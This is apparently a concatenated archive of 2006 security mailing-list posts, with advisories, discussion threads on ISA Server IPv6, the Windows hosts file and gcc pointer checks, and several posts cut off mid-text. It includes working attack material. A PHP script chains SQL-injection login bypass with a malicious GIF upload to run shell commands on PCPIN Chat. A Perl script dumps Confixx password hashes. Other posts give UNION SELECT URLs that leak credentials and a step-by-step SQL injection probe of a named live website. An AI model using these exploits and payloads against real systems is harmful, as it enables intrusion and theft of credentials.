ASPSitem <= 1.83 Remote SQL Injection Vulnerability
--Security Report--
Advisory: ASPSitem <= 1.83 Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 19/04/06 19:33 PM
---
Contacts:{
ICQ: 10072
MSN/Email: [EMAIL PROTECTED]
Web: http://www.nukedx.com
}
---
Vendor: ASPSitem (http://www.aspsitem.com)
Version: 1.83 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to id
parameter in Haberler.asp
Level: Critical
Solution: Upgrade your ASPSitem version to 2.0
---
How&Example:
GET -> http://[victim]/[ASPSitemDir]/Haberler.asp?haber=devam&id=[SQL]
EXAMPLE ->
http://[victim]/[ASPSitemDir]/Haberler.asp?haber=devam&id=-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,
kayittarih,email%20FROM%20uyeler%20where%20id%20like%201
with this example remote attacker can leak userid 1's login information from
database.
---
Timeline:
* 19/04/2006: Vulnerability found.
* 19/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=23
---
Dorks: "Teþekkür ASPSitem"
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=23
Strengthen OpenSSH security?
I'm sure that most folks with hosts that expose an OpenSSH daemon to the Internet have been getting the usual probes and password guessing attempts and have been taking appropriate actions (e.g. setting AllowUsers and using strong passwords) to protect yourselves. But today, on one of my servers, I noticed a new trend: the attackers are getting smarter. Apparently, they can tell the difference between a user ID which is not named in an AllowUsers directive -- or which does not exist at all -- from one for which they just haven't guessed the correct password. I've now watched as some attackers (but not all... yet) tried various user IDs, noted which ones existed and were in AllowUsers, and focused password guessing attacks on just those user IDs. It seems to me that sshd should not tip its hand by returning different responses when a user ID can be used for logins than when it can't -- allowing an attacker to focus password guessing attacks on user IDs with which it would have a chance of gaining access. For those folks out there who are more familiar with OpenSSH than I am: How hard would it be to make the responses indistinguishable? --Brett Glass
[USN-271-1] Firefox vulnerabilities
=== Ubuntu Security Notice USN-271-1 April 19, 2006 mozilla-firefox, firefox vulnerabilities CVE-2005-4134, CVE-2006-0292, CVE-2006-0296, CVE-2006-0749, CVE-2006-1727, CVE-2006-1728, CVE-2006-1729, CVE-2006-1730, CVE-2006-1731, CVE-2006-1732, CVE-2006-1733, CVE-2006-1734, CVE-2006-1735, CVE-2006-1736, CVE-2006-1737, CVE-2006-1738, CVE-2006-1739, CVE-2006-1740, CVE-2006-1741, CVE-2006-1742, CVE-2006-1790 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: firefox mozilla-firefox The problem can be corrected by upgrading the affected package to version 1.0.8-0ubuntu4.10 (for Ubuntu 4.10), 1.0.8-0ubuntu5.04 (for Ubuntu 5.04), or 1.0.8-0ubuntu5.10 (for Ubuntu 5.10). After a standard system upgrade you need to restart Firefox to effect the necessary changes. Details follow: Web pages with extremely long titles caused subsequent launches of Firefox browser to hang for up to a few minutes, or caused Firefox to crash on computers with insufficient memory. (CVE-2005-4134) Igor Bukanov discovered that the JavaScript engine did not properly declare some temporary variables. Under some rare circumstances, a malicious website could exploit this to execute arbitrary code with the privileges of the user. (CVE-2006-0292, CVE-2006-1742) The function XULDocument.persist() did not sufficiently validate the names of attributes. An attacker could exploit this to inject arbitrary XML code into the file 'localstore.rdf', which is read and evaluated at startup. This could include JavaScript commands that would be run with the user's privileges. (CVE-2006-0296) Due to a flaw in the HTML tag parser a specific sequence of HTML tags caused memory corruption. A malicious web site could exploit this to crash the browser or even execute arbitrary code with the user's privileges. (CVE-2006-0749) Georgi Guninski discovered that embedded XBL scripts of web sites could escalate their (normally reduced) privileges to get full privileges of the user if that page is viewed with "Print Preview". (CVE-2006-1727) The crypto.generateCRMFRequest() function had a flaw which could be exploited to run arbitrary code with the user's privileges. (CVE-2006-1728) Claus Jørgensen and Jesse Ruderman discovered that a text input box could be pre-filled with a filename and then turned into a file-upload control with the contents intact. A malicious web site could exploit this to read any local file the user has read privileges for. (CVE-2006-1729) An integer overflow was detected in the handling of the CSS property "letter-spacing". A malicious web site could exploit this to run arbitrary code with the user's privileges. (CVE-2006-1730) The methods valueOf.call() and .valueOf.apply() returned an object whose privileges were not properly confined to those of the caller, which made them vulnerable to cross-site scripting attacks. A malicious web site could exploit this to modify the contents or steal confidential data (such as passwords) from other opened web pages. (CVE-2006-1731) The window.controllers array variable (CVE-2006-1732) and event handlers (CVE-2006-1741) were vulnerable to a similar attack. The privileged built-in XBL bindings were not fully protected from web content and could be accessed by calling valueOf.call() and valueOf.apply() on a method of that binding. A malicious web site could exploit this to run arbitrary JavaScript code with the user's privileges. (CVE-2006-1733) It was possible to use the Object.watch() method to access an internal function object (the "clone parent"). A malicious web site could exploit this to execute arbitrary JavaScript code with the user's privileges. (CVE-2006-1734) By calling the XBL.method.eval() method in a special way it was possible to create JavaScript functions that would get compiled with the wrong privileges. A malicious web site could exploit this to execute arbitrary JavaScript code with the user's privileges. (CVE-2006-1735) Michael Krax discovered that by layering a transparent image link to an executable on top of a visible (and presumably desirable) image a malicious site could fool the user to right-click and choose "Save image as..." from the context menu, which would download the executable instead of the image. (CVE-2006-1736) Several crashes have been fixed which could be triggered by web sites and involve memory corruption. These could potentially be exploited to execute arbitrary code with the user's privileges. (CVE-2006-1737, CVE-2006-1738, CVE-2006-1739, CVE-2006-1790) If the user has turned on the "Entering secure site" modal warning dialog, it was possible to spoof the browser's secure-site indicators (the lock icon and the gold URL field background) by first loading the target secure site in a pop-up window, t
PCPIN Chat <= 5.0.4 "login/language" remote cmmnds xctn
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "-> works with magic_quotes_gpc = Off\r\n";
echo "dork: \"powered by PCPIN.com\"\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to pcpin\r\n";
echo "cmd: a shell command\r\n";
echo "Options:\r\n";
echo " -p[port]:specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /pcpin/ cat ./config/db.inc.php\r\n";
echo "php ".$argv[0]." localhost /pcpin/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
die;
}
/*
software site: http://www.pcpin.com/
description: a chat software written in php that uses mysql for data storage
vulnerabilites:
i) sql injection:
you can login as admin typing:
username: ") or isnull(1/0)/*
password: [whatever]
query becomes:
SELECT * FROM pcpin_user WHERE (cookie = "#EMPTY#" AND cookie <> "") OR
(login = "") or isnull(1/0)/* AND password = "[somehash]") AND activated =
"1"
LIMIT 1
ii) arbitrary local inclusion:
now you can upload smilies with php code inside, we have a local inclusion
bug in "language" argument when you select a language so, you can include
a gif file and launch commands...
both works with magic_quotes_gpc=Off
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 10);
}
$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the
path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
#step 1 -> sql injection, login as admin
echo "[1] login...\r\n";
$sql="\") or isnull(1/0)/*";
$sql=urlencode($sql);
$data ="lostpassword=";
$data.="&include=2";
$data.="&language=english";
$data.="&submitted=1";
$data.="&login=".$sql;
$data.="&password=suntzu";
$packet ="POST ".$p."main.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(" ",$temp[1]);
$cookie=$temp2[0];
if ($cookie =='') {die("Unable to retrieve session cookie...");}
echo "Cookie -> ".$cookie."\r\n";
$temp=explode("name=\"session_id\" value=\"",$html);
$temp2=explode("\"",$temp[1]);
$sid=$temp2[0];
if ($sid =='') {die("Unable to retrieve session id...");}
echo "session id -> ".$sid."\r\n";
srand(make_seed());
$v = rand(1,9);
#step 2 -> Upload a malicious gif file...
echo "[2] uploading the gif file...\r\n";
$data='-7d613b1d0448
Content-Disposition: form-data; name="smiliefile"; filename="suntzu.gif"
Content-Type: image/gif
-7d613b1d0448
Content-Disposition: form-data; name="session_id";
'.$s
[eVuln] N.T. Version 1.1.0 XSS and PHP Code Insertion Vulnerabilities
New eVuln Advisory: N.T. Version 1.1.0 XSS and PHP Code Insertion Vulnerabilities http://evuln.com/vulns/121/summary.html Summary eVuln ID: EV0121 CVE: CVE-2006-1657 CVE-2006-1658 Vendor: Chucky A. Ivey Software: N.T. Sowtware's Web Site: http://www.v-gfx.net/ Versions: 1.1.0 Critical Level: Dangerous Type: Multiple Vulnerabilities Class: Remote Status: Unpatched. No reply from developer(s) PoC/Exploit: Available Solution: Not Available Discovered by: Aliaksandr Hartsuyeu (eVuln.com) -Description--- 1. Cross-Site Scripting Vulnerable Script: index.php Parameter username is not properly sanitized. This can be used to post arbitrary HTML or web script code. This code will be executed when administrator will visit "Login Log" page. Administrator's session is threatened. 2. PHP Code Insertion Administrator has an ability to edit variables in ticker.db.php file. Script dont make any sanitation of entered values. This can be used to insert arbitrary PHP code. System access is possible. --PoC/Exploit-- Available at: http://evuln.com/vulns/121/exploit.html --Solution- No Patch available. --Credit--- Discovered by: Aliaksandr Hartsuyeu (eVuln.com) Regards, Aliaksandr Hartsuyeu http://evuln.com - Penetration Testing Services .
SQL Injection in incredibleindia.org
Vulnerable Page: http://www.incredibleindia.org/newsite/cms_Page.asp Found By: Susam Pal Found On: 29th March, 2006, Wednesday Vulnerability Type: SQL Injection Action Taken: Reported to [EMAIL PROTECTED] Description: www.incredibleindia.org is a tourism website. The site is prone to SQL injection which can be exploited to reveal the table names, some column names as well as their data types. Exploiting the vulnerability requires some reverse engineering. The ASP ODBC error messages can be displayed by passing bad values for the parameters in the URL. Example URL 1: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828' Error Found: Unclosed quotation mark before the character string ' and mncpage.mnccategoryid = mnccategory.mnccategoryid'. Conclusion: Direct SQL Injection is possible. There are 2 tables, 'mncpage' and 'mnccategory'. Both of them have a column called 'mnccategoryid'. Example URL 2: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 1-- Example URL 3: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 2-- Example URL 4: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 3-- Error Found: None Example URL 5: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 4-- Error Found: The ORDER BY position number 4 is out of range of the number of items in the select list. Conclusion: The table being used by the query selects 3 columns and one of them is an integer. Example URL 6: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select 'varchar1', 'varchar2', 'varchar3' from mncpage-- Error Found: Syntax error converting the varchar value 'varchar1' to a column of data type int. Conclusion: The 1st column in the select query is an integer. Error URL 7: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select mnccategoryid, 'varchar2', 'varchar3' from mncpage-- Error Found: None Conclusion: The column 'mnccategory' is of integer type.
Re: Re[2]: Bypassing ISA Server 2004 with IPv6
On Sat, 15 Apr 2006, Thor (Hammer of God) wrote: ISA Server is an application that is installed on top of the base OS. Are you suggesting that the application should actually prevent the local administrator of the host machine from installing and configuring what protocols are bound to what adapters? No, I'm suggesting that the application should enable the local administrator to configure that application. Configuring a firewall is a bit more than setting a domain name. It must contain some (preferebly reasonable) filtering mechanisms. From what is said so far this seems not to be possible. If that is true, ISA is broken by design. We are talking about a firewall. A firewall that cannot filter is not a firewall. Agreed? To me, *that* is the borderline. There is no such thing as "for what ever reason ipv6 in enabled on ISA" when it comes to administering an enterprise firewall product. If an administrator installs configures ipv6 on the OS of the firewall, and then binds ipv6 to a protected network segment, then they absolutely, positively, without-a-doubt get exactly what they deserve. Do you think the same applies to ipv4? I said "for what ever reason ipv6 in enabled on ISA" because I am definitely not in the position to guess all possible reasons for activating ipv6. Anyone who does that without understanding what they are doing are simply taking jobs away from competent, knowledgeable administrators. You are speaking out of my deepest heart. Anyhow, you are aware that it is not always the incompentent admin; sometimes it is the incompetent superior and not every admin has the nerv and the backing to say no to idiotic orders by management. The mindset of "protecting the ignorant administrator from themselves" in this business has got to end. Positioning this as if there is some flaw in Definitely. ISA because the application does not prohibit a local administrator from binding unsupported protocols to interfaces is simply ludicrous. In fact, it I still fail to see why an unsupported protocol goes through anyway. The reason for implementing a firewall is to separate networks with different trust levels. Not to connect them wide open. For this any router will do. is the opposite that is true: If I as an administrator of a machine want to bind a protocol to an adapter for some reason (as in a separate, private segment for use in a particular environment) then I should, indeed MUST, be able to do it. And I will be responsible for the implications of doing so. Sure. But even in a protected enviroment you may want some additional restrictions. There was an earlier thread today where a simple list of hostnames being filtered from the Win32 HOSTS file was positioned as "deliberate sabotage" of our machines by Microsoft; a case of "It's my computer- keep your hands off." Yet here, the integrity of a product is being challenged because the application does not prevent an administrator from installing and binding protocols at the OS-level in cases where the application is not designed to filter those protocols? That is a double-standard at its best. Again: If that application is a firewall it's a must to be able to filter. Anything else is not logical. If the application is some funny network gaming tool, then I heartly agree. Cheers, Christine Kronberg.
Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup
On 14/04/06, Brandon S. Allbery KF8NH <[EMAIL PROTECTED]> wrote: > > On Apr 13, 2006, at 1:29 , Dave Korn wrote: > > > Hey, guess what I just found out: Microsoft have deliberately > > sabotaged > > their DNS client's hosts table lookup functionality. > > I thought this was part of avoiding malware attempts to block Windows > Update. In that case, they should allow us to add symantec et al - it's not much use having Windows Update working while the machine is happily rootkitted. Grepping hosts files across campus for 127.0.0.1 ... liveupdate.symantec.com - or your local equivalent - can prove interesting. If it was a feature, I'd expect there to be ways to add to the list of pass-through domains, or ways to disable it. cheers, Jamie -- Jamie Riden / [EMAIL PROTECTED] / [EMAIL PROTECTED] "Microsoft: Bringing the world to your desktop - and your desktop to the world." -- Peter Gutmann
Re: Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup
FYI: go.microsoft.com is used to point to security bulletins. In fact, all the domains listed with the exception of MSN.com are used in the Windows and Office patching process.
[eVuln] MD News Authentication Bypass and SQL Injection Vulnerabilities
New eVuln Advisory: MD News Authentication Bypass and SQL Injection Vulnerabilities http://evuln.com/vulns/120/summary.html Summary eVuln ID: EV0120 Software: MD News Sowtware's Web Site: http://www.matthewdingley.co.uk/ Versions: 1 Critical Level: Moderate Type: Multiple Vulnerabilities Class: Remote Status: Unpatched. No reply from developer(s) PoC/Exploit: Available Solution: Not Available Discovered by: Aliaksandr Hartsuyeu (eVuln.com) -Description--- 1. SQL Injection. Vulnerable script: admin.php Parameter id is not properly sanitized before being used in SQL query. This can be used to make any SQL query by injecting arbitrary SQL code. 2. Authentication Bypass. "Administration Area" script has no any authentication. Any user can get access to administrator's area. (Just need to know script name) --PoC/Exploit-- Available at: http://evuln.com/vulns/120/exploit.html --Solution- No Patch available. --Credit--- Discovered by: Aliaksandr Hartsuyeu (eVuln.com) Regards, Aliaksandr Hartsuyeu http://evuln.com - Penetration Testing Services .
Re[3]: Bypassing ISA Server 2004 with IPv6
Dear 3APA3A, Microsoft ISA Server can't filter events from Microsoft Mouse, but Apples and peas? Microsoft Mouse can be bound to computer. It's security risk, but I know how to secure mouse without ISA and I accept this risk. Nice, that you do. If I manage by any means to see remotely that you have attached a mouse to your ISA and to (ab)use it, I'm much better that I thought - and you have much bigger problems than you thought. The nice thing about icmp is that I do not require much knowledge to get information remotely. Same true with ipv6. Unless something in between stops me. Which brings us back to the topic: a firewall allowing too much. IPv6 can not be filtered by ISA, but it still can be filtered by different tools, or by it's own means, as IPv6 support network-level security. Unlike IPv4, IPv6 supports authentication, integrity checking and encryption natively. See ipsec6.exe and descriptions for Security Association Batabase and Security Policy Database. So you state that it is perfectly well for a firewall to allow any traffic through. Per default? And that this firewall does not need to have the interface to configure what traffic is allowed? I disagree. If a firewall supports a protocol, that same firewall should also provide the proper means and interface to configure it. And not blow holes in networks. Cheers, Christine Kronberg.
EasyGallery Cross-Site Scripting
Website : www.wingnut.net.ms Author : Botan Credits : B3g0k,Nistiman,flot,Netqurd Original Advisory : http://advisory.patriotichackers.com/index.php?itemid=5 Description : "EasyGallery is a simple web-photogallery with a maximum of user-friendlyness. All you have to do is to upload your photos and the EasyGallery files onto your webspace" XSS code : http://www.site.com/[path]/EasyGallery.php?ordner=XSS
Confixx SQL Injection exploit (confixx_exploit.pl)
Well - the patch is out - here is the exploit.
Hey - German hosters - if you call yourself "serverkompetenz.de" -
why don't you fix your servers?
sincerly
defa
BOF
#!/usr/bin/perl
# #
# exploit for confixx professional <= 3.1.2 #
# #
# the vulerability was discovered by: LoK Crew #
# references: http://www.securityfocus.com/bid/17476 #
# #
# exploit can be used for any purpose but on own risk #
# #
# (c) by defa - sorry for the crappy code #
# #
# url is just the host - directory is $url/user/index.php by default
#
# the exploit just fetches the longpw hashes of alle
users #
# #
# parts of the code are stolen from RuSH exploits - thanks a lot
folks #
use IO::Socket;
if (@ARGV < 1)
{
print q(
exploit by defa (2006)
=
confixx_exploit.pl [URL]
params:
[URL] - server url
example: confixx_exploit.pl 127.0.0.1
);
exit;
}
$serv = $ARGV[0];
$serv =~ s/(http:\/\/)//eg;
for ($i=0;$i<=100;$i++)
{
$hit = 0;
$url = "http://";;
$url .= $serv;
$url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";
$url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B11,':%22','HIT:
%20',";
$url .= "kunde,'%20:%20',longpw,'%20:%20','%22;')%20AS%20'sdata'%
20FROM%20";
$url .= "kunden%20LIMIT%20";
$url .= "$i,1/*";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "80") || die "[-] CONNECT FAILED\r\n";
print $socket "GET $url HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket 'User-Agent: confixx_exploit'."\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>)
{
if ($answer =~ /HIT:/)
{
@result = split(/: /,$answer);
print "$result[1]: $result[2]\n";
$hit = 1;
}
}
if ($hit == 0) {die("that's it");}
}
EOF
--
don't eat yellow snow
Re: Re[2]: Bypassing ISA Server 2004 with IPv6
ISA Server is an application that is installed on top of the base OS. Are you suggesting that the application should actually prevent the local administrator of the host machine from installing and configuring what protocols are bound to what adapters? To me, *that* is the borderline. There is no such thing as "for what ever reason ipv6 in enabled on ISA" when it comes to administering an enterprise firewall product. If an administrator installs configures ipv6 on the OS of the firewall, and then binds ipv6 to a protected network segment, then they absolutely, positively, without-a-doubt get exactly what they deserve. Anyone who does that without understanding what they are doing are simply taking jobs away from competent, knowledgeable administrators. The mindset of "protecting the ignorant administrator from themselves" in this business has got to end. Positioning this as if there is some flaw in ISA because the application does not prohibit a local administrator from binding unsupported protocols to interfaces is simply ludicrous. In fact, it is the opposite that is true: If I as an administrator of a machine want to bind a protocol to an adapter for some reason (as in a separate, private segment for use in a particular environment) then I should, indeed MUST, be able to do it. And I will be responsible for the implications of doing so. There was an earlier thread today where a simple list of hostnames being filtered from the Win32 HOSTS file was positioned as "deliberate sabotage" of our machines by Microsoft; a case of "It's my computer- keep your hands off." Yet here, the integrity of a product is being challenged because the application does not prevent an administrator from installing and binding protocols at the OS-level in cases where the application is not designed to filter those protocols? That is a double-standard at its best. t On 4/10/06 12:34 PM, "Christine Kronberg" <[EMAIL PROTECTED]> spoketh to all: >Thanks for clearing that. But: If ISA is not able to filter IPv6 so >why can it be bound to an interface anyway? Just to route things >through? Blindly through a firewall? >Another posting talks about limited filtering capabilities. Roman >wrote, icmp went through. So where is the borderline? It still seems >to me that in the moment for what ever reason ipv6 is enabled on ISA >the network it should secure is exposed. > >Cheers, > >Christine Kronberg.
Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup
> I agree that there should have been better documentation of this, but I > think the noted objections are a bit hyperbolic. While I don't disagree with what you said, I think there are some things you didn't consider. First, why is anything besides what is required for windows update being bypassed? Why MSN.COM? Why NOT Symantec.com? I mean this looks more like a way to keep passport functional than as a way to foil trojans. Second, why is it that it's darn near impossible to screw with media player or Messenger (both are protected by Windows file protection) yet hosts file changes don't even popup a dialog box to ask the user if the change is ok? I mean this is a really sneaky way of "fixing" things. Also before you say WFP or a popup could be disabled by a trojan, so could this fix. Third, this appears to me to be just more half witted fixes imo. The problem is a trojan modifying hosts then fix the problem instead of ignoring hosts. Provide a locking mechanism for hosts, remove the trojan, there are a hundred ways to fix this that are far more proper ways to do things than this. Geo.
Re: gcc 4.1 bug miscompiles pointer range checks, may place you at risk
On Mon, 17 Apr 2006, Felix von Leitner wrote:
I wrote a small library of functions to do typical range checks as they
are needed in code that handles incoming packets or messages from
untrusted sources. My impetus was SMB code, in case you want to know.
Here is one of my functions:
static inline int range_ptrinbuf(const void* buf,unsigned long len,const void*
ptr) {
register const char* c=(const char*)buf; /* no pointer arithmetic on
void* */
return (c && c+len>c && (const char*)ptr-cc" is the code with which you would
typically check for integer overflows, which is a check that for example
an IP stack would do, or Samba. So, if you compiled your kernel with
gcc 4.1, or your Samba, or some other packet handling code in a security
relevant context, you might want to recompile with gcc 3.
Hi,
This is interesting. But I am not sure that it is really a compiler bug.
Rules for pointer arithmetic in C are rather restrictive, and stepping
outside of them results in "undefined behavior". I don't have the current
ANSI C standard available, but even my old copy of K&R I says that you
shouldn't compare pointers which point to different arrays, or you may get
nonsense. So I have a suspicion that this code may be illegal, and the
different compiler versions just happen to have chosen different
interpretations.
In fact, in some sense the new result is correct. What if buf is an array
of size 2^32? Then buf + 0xU does in fact point to an element of
buf beyond the 0th, so 'buf + 0xU > buf' is in that sense a true
statement. Of course, no existing x86 operating system is set up to work
like that, but the compiler doesn't know that.
I guess a more general question is "if q is a pointer, and buf is an array
of size n, how to tell if q points to an element of buf?" You would like
to be able to do
q >= buf && q < buf+n
but I think maybe this is not right. In fact, on a machine with very
crazy memory management, it might be very difficult or impossible to
answer that question.
I guess the correct test is not to try to apply the test to the pointer
but to the index. E.g. if given an untrusted index i, rather than letting
q=buf+i and then trying to validate q, just remember the value for i and
check whether i >= 0 && i <= n. That seems foolproof to me.
You might want to bring this up on a forum like comp.lang.c where people
know a lot about the C language. Alternatively, if you've already
reported this as a bug to the gcc maintainers (which of course you would
do before posting to bugtraq, right? :), they will probably be able to
explain what's going on.
In any case, it's useful to know about this, if nothing else so that
people know to avoid code like that. Thanks for bringing it up.
--
Nate Eldredge
[EMAIL PROTECTED]
Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup
Just take a binary editor to dnsapi.dll and change the strings to .ccc instead of .com That should fix it, until the next update cycle.
RE: redirection vuln crawlers breed & security through obscurity
1. This is definitely a pretty common, if not well-known
problem, being "broken access control" that relies on
obscurity or something weak/trivial to forge (like an
HTTP refer field path) to control access to an entry
point in a webapp. Sometimes, no further authorization
checks are made (on pages/functions behind the entrypoint).
2. Tools already exist that allow you to manually ignore
redirects per your question blow, and some do this automatically.
www.owasp.org and www.webappsec.org are good places to start.
3. This said, "how secure?" in this case is a math problem.
Given you know the directory structure, if all you are doing
is trying to brute-force enumerate the file name, then all
you have is a fuzzing problem plus HTTP requests/sec rate
(that is realistic to achieve).
If your admin default page is "supersexysecretsignon.php"
I can turn a fuzzer lose on this until I get an HTTP 200 OK,
or a change in body content, and automatically flag the page.
In the case above, I have 21 characters to fuzz plus an
page extension, so (21^27 * [$.extensions]) to work through.
I could fuzz *everything* or be lazy and fuzz a variable
and tack on a list of say 10 well-known extensions to each
iteration of the variable.
Assuming I do not know the page name, let's take 50 chars
ASCII/numeric, assume it is case-sensitive on *nix, so you
would have 50^64 possible combinations starting at "a".
Then multiply that times the number of extensions you want
to try, unless you want to fuzz those characters too.
How fast you could work through that keyspace is a good
question. I recommend you Google for Mike Shema's work
on session token entropy from RSA '05 and later, and
he has excellent tables on 'n' HTTP/req/sec = $work_time
to exhaust a given keyspace, which is exactly what you
are essentially asking here I believe.
Excellent questions, again. Two good mailing lists to ask
these sorts of questions on are:
[EMAIL PROTECTED]
[EMAIL PROTECTED]
Double-check my math. I haven't my coffee today, adding
to my native processor's already unfortunate tendency to
introduce random floating-point error into my ad-hoc calculations,
Arian J. Evans
FishNet Security
Note: Microsoft Office breaks text-based emails by default.
To see text messages properly formatted, turn off:
Tools>Options>|Email Options|+Remove Extra Line Breaks
816.421.6611 [fns office]
816.701.2045 [direct]
888.732.9406 [fns toll-free]
816.421.6677 [fns general fax]
913.710.7085 [mobile] <--best bet
[EMAIL PROTECTED] [email]
http://www.fishnetsecurity.com
> -Original Message-
> From: Ivan Sergio Borgonovo [mailto:[EMAIL PROTECTED]
> Sent: Saturday, April 15, 2006 7:47 AM
> To: bugtraq@securityfocus.com
> Subject: redirection vuln crawlers breed & security through obscurity
>
>
> I just came across such kind of code (php) written by a colegue:
>
> //header.inc
> if($_SESSION['UN']!='hardcoded_UN' or $_SESSION['UN']!='hardcoded_PW')
> header("Location: ./login.html");
> //missing else to mitigate the problem!!
> //HTML stuff here...
>
> code structure of all the other "supposed to be" private pages is:
>
> //wannabeprotected.php
> include_once("include/header.inc")
> //wannabe protected code
>
> Everything resides at something like:
> http://site/admin/
>
> of course the ONLY thing you've to do to break into the admin
> interface is:
> - disable redirection in your preferred browser (w3m)
> - guess the right address and
> - point exactly to it: http://site/admin/index.php or any
> existing page[1] eg. http://site/admin/killingmesoftly.php
>
> http://site/admin/ won't work. I did some research to see if
> you could find a way to make "educated guess" by examining
> the flow of HTTP responses, but I didn't came out with any
> good idea. Nevertheless index.php doesn't seem to be a bad
> educated guess (as Default.asp, index.asp, index.pl, login.asp...).
>
> Now some questions and a proposal:
> - how safe is to rely on secrecy of the URL? I'm looking for
> a quantification of the risk, not a "it is a bad idea" ;)
> of course http://site/`pwgen -N1 30`/`pwgen -N1 30`.php is
> safer than http://site/admin/index.php. Any already made
> study? numbers?
> - are SE like google going to index such kind of pages if
> there is no "external" link[*]?
> - are there already many specialized vuln crawlers looking
> for such kind of URLs?
>
> What about building crawlers that ignore redirection to scan
> for such kind of vulns?
> I think that kind of mistake should be pretty popular.
>
> Did I reinvent the wheel?
>
> [1] this makes educated guessing easier increasing the number
> of potential targets: manager.php, insert.php, delete.php and
> it makes this [in]security model rely just on the dir path...
> unless the programmer is so crazy to call all his files with
> random names. But coding the access credential in a path
> makes the code not that relocable... etc... etc..
>
> [*] What I mean: it exists a chain of links that conn
Tlen.PL e-mail XSS vulnerability.
As written in: http://security.pass.pl/adv/160406_XSS_tlen_pl.txt
::File: 060416_XSS_tlen_pl
::Date: 16 Feb 2006
::Author: Tomasz Koperski <[EMAIL PROTECTED]>
::URL: http://security.pass.pl
::1::Overview::
Tlen.PL e-mail system is affected to cross-site scripting vulnerability, not
validating HTML tags in e-mail message subject.
::2::Description::
Tlen.PL is a popular Polish IM system provided by o2.pl, which includes e-mail
accounts, and e-mail client built into the
communicator software (under Windows it is actualy an instance of Internet
Explorer, displaying webmail system).
Depending on the server 'assigned' to the account (varying probably by the date
of registration), webmail client does
not validate e-mail subject for HTML tags, allowing attacker to inject script
code.
The vulnerable server is accessed by default with Tlen.pl IM client (by older
accounts).
The vulnerable server does not provide webmail services through default web
browser access
(using for ex.: http://poczta.o2.pl, http://mail.tlen.pl), yet it is still
